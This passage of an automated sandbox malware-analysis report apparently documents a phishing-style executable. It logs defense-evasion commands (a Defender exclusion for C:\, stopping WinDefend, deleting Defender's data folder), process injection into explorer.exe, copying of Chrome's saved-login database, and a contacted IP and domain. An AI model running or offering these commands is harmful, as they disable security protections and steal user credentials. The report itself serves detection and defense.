Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D08EC7 mov eax, dword ptr fs:[00000030h] 32_2_04D08EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF16E0 mov ecx, dword ptr fs:[00000030h] 32_2_04CF16E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD76E2 mov eax, dword ptr fs:[00000030h] 32_2_04CD76E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5FE87 mov eax, dword ptr fs:[00000030h] 32_2_04D5FE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D446A7 mov eax, dword ptr fs:[00000030h] 32_2_04D446A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D90EA5 mov eax, dword ptr fs:[00000030h] 32_2_04D90EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD7E41 mov eax, dword ptr fs:[00000030h] 32_2_04CD7E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D8AE44 mov eax, dword ptr fs:[00000030h] 32_2_04D8AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD766D mov eax, dword ptr fs:[00000030h] 32_2_04CD766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEAE73 mov eax, dword ptr fs:[00000030h] 32_2_04CEAE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCC600 mov eax, dword ptr fs:[00000030h] 32_2_04CCC600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF8E00 mov eax, dword ptr fs:[00000030h] 32_2_04CF8E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D81608 mov eax, dword ptr fs:[00000030h] 32_2_04D81608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA61C mov eax, dword ptr fs:[00000030h] 32_2_04CFA61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D7FE3F mov eax, dword ptr fs:[00000030h] 32_2_04D7FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCE620 mov eax, dword ptr fs:[00000030h] 32_2_04CCE620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D037F5 mov eax, dword ptr fs:[00000030h] 32_2_04D037F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47794 mov eax, dword ptr fs:[00000030h] 32_2_04D47794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CD8794 mov eax, dword ptr fs:[00000030h] 32_2_04CD8794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDEF40 mov eax, dword ptr fs:[00000030h] 32_2_04CDEF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDFF60 mov eax, dword ptr fs:[00000030h] 32_2_04CDFF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D98F6A mov eax, dword ptr fs:[00000030h] 32_2_04D98F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA70E mov eax, dword ptr fs:[00000030h] 32_2_04CFA70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5FF10 mov eax, dword ptr fs:[00000030h] 32_2_04D5FF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D9070D mov eax, dword ptr fs:[00000030h] 32_2_04D9070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEF716 mov eax, dword ptr fs:[00000030h] 32_2_04CEF716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC4F2E mov eax, dword ptr fs:[00000030h] 32_2_04CC4F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFE730 mov eax, dword ptr fs:[00000030h] 32_2_04CFE730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov ecx, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D5B8D0 mov eax, dword ptr fs:[00000030h] 32_2_04D5B8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC58EC mov eax, dword ptr fs:[00000030h] 32_2_04CC58EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC40E1 mov eax, dword ptr fs:[00000030h] 32_2_04CC40E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CC9080 mov eax, dword ptr fs:[00000030h] 32_2_04CC9080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D43884 mov eax, dword ptr fs:[00000030h] 32_2_04D43884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF20A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF20A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFF0BF mov ecx, dword ptr fs:[00000030h] 32_2_04CFF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h] 32_2_04CFF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFF0BF mov eax, dword ptr fs:[00000030h] 32_2_04CFF0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D090AF mov eax, dword ptr fs:[00000030h] 32_2_04D090AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h] 32_2_04CE0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE0050 mov eax, dword ptr fs:[00000030h] 32_2_04CE0050
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D82073 mov eax, dword ptr fs:[00000030h] 32_2_04D82073
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D91074 mov eax, dword ptr fs:[00000030h] 32_2_04D91074
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h] 32_2_04D47016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h] 32_2_04D47016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D47016 mov eax, dword ptr fs:[00000030h] 32_2_04D47016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h] 32_2_04D94015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D94015 mov eax, dword ptr fs:[00000030h] 32_2_04D94015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF002D mov eax, dword ptr fs:[00000030h] 32_2_04CF002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CDB02A mov eax, dword ptr fs:[00000030h] 32_2_04CDB02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEA830 mov eax, dword ptr fs:[00000030h] 32_2_04CEA830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h] 32_2_04CCB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h] 32_2_04CCB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CCB1E1 mov eax, dword ptr fs:[00000030h] 32_2_04CCB1E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D541E8 mov eax, dword ptr fs:[00000030h] 32_2_04D541E8
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CFA185 mov eax, dword ptr fs:[00000030h] 32_2_04CFA185
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEC182 mov eax, dword ptr fs:[00000030h] 32_2_04CEC182
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF2990 mov eax, dword ptr fs:[00000030h] 32_2_04CF2990
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D451BE mov eax, dword ptr fs:[00000030h] 32_2_04D451BE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CF61A0 mov eax, dword ptr fs:[00000030h] 32_2_04CF61A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov ecx, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CE99BF mov eax, dword ptr fs:[00000030h] 32_2_04CE99BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D469A6 mov eax, dword ptr fs:[00000030h] 32_2_04D469A6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04D849A4 mov eax, dword ptr fs:[00000030h] 32_2_04D849A4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h] 32_2_04CEB944
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 32_2_04CEB944 mov eax, dword ptr fs:[00000030h] 32_2_04CEB944
Enables debug privileges
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmmon32.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 185.53.179.90 80
Source: C:\Windows\explorer.exe Domain query: www.seniorlivingcaelderly.com
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 960000
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Code function: 9_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError, 9_2_00401C26
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\sc.exe' /WindowState 0 /CommandLine 'stop WinDefend' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /EXEFilename 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' /WindowState 0 /CommandLine 'rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'powershell' Add-MpPreference -ExclusionPath C:\
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Process created: C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe C:\Users\user\AppData\Local\Temp\Require your Sales Ledger from 01-April-2020.exe
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 2644
Source: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\AdvancedRun.exe' /SpecialRun 4101d8 6332
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: explorer.exe, 00000019.00000000.318115996.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.348253683.000000000871F000.00000004.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000019.00000002.479165173.0000000001980000.00000002.00000001.sdmp, cmmon32.exe, 00000020.00000002.479790107.0000000003550000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Require your Sales Ledger from 01-April-2020.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
